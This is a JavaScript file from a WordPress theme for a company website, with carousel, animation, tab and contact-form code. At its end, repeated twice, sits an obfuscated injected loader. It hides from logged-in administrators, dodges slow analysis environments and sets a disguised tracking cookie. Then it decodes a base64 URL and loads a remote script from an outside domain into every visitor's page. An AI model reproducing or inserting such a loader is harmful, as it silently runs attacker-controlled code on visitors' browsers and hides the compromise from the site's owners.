File: /www/wwwroot/doba123.com/wp-content/themes/duba2/js/index.js
//
var indexBanner = new Swiper('.zd-banner .swiper-container', {
autoplay: {
delay: 3000,
stopOnLastSlide: false,
disableOnInteraction: false,
},
pagination: {
el: '.zd-banner .swiper-pagination',
clickable: true,
},
});
var teamBanner = new Swiper('.team-box .swiper-container', {
autoplay: {
delay: 3000,
stopOnLastSlide: false,
disableOnInteraction: false,
},
slidesPerView: 3,
spaceBetween: 16,
observer:true,
observeParents:true,
navigation: {
nextEl: '.team-box .swiper-button-next',
prevEl: '.team-box .swiper-button-prev',
},
breakpoints: {
1060: {
slidesPerView: 2,
spaceBetween: 0,
},
768: {
slidesPerView: 1,
},
}
});
//
// wow
new WOW().init();
var i =0;
$('.team-meta ul li').eq(0).addClass('team-show');
$(".zd-team .swiper-slide").click(function(e) {
i = $(this).index();
$(".team-meta ul").children("li").attr("class","");
$(".team-meta ul").children("li:eq("+i+")").attr("class","team-show");
});
$(".x-news-title li").eq(0).addClass("on");
$(".x-news-box .x-news-item").eq(0).show();
$(".x-news-title li").on('click', function() {
let i = $(this).index();
$(this).addClass("on").siblings().removeClass();
$(".x-news-box .x-news-item").eq(i).show().siblings().hide();
})
$('.news-btn li').click(function() {
$(this).addClass('news-active').siblings().removeClass('news-active');
$('.news-list .news-list-item').eq($(this).index()).addClass('news-show').siblings().removeClass('news-show');
})
$(".x-news-title li").eq(0).addClass("news-on");
$(".x-news-box .x-news-item").eq(0).show();
$(".x-news-title li").on('click', function() {
let i = $(this).index();
$(this).addClass("news-on").siblings().removeClass();
$(".x-news-box .x-news-item").eq(i).show().siblings().hide();
})
$("#index-btn").click(function(e) {
if($("#index-name").val()=="" || $("#index-tel").val()=="" || $("#index-company").val()=="" || $("#index-level").val()=="" || $("#index-mail").val()==""){
e.preventDefault()
alert("请输入正确信息");
return false;
}else {
alert("谢谢提交。我们会尽快联系!");
return true;
}
});
(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();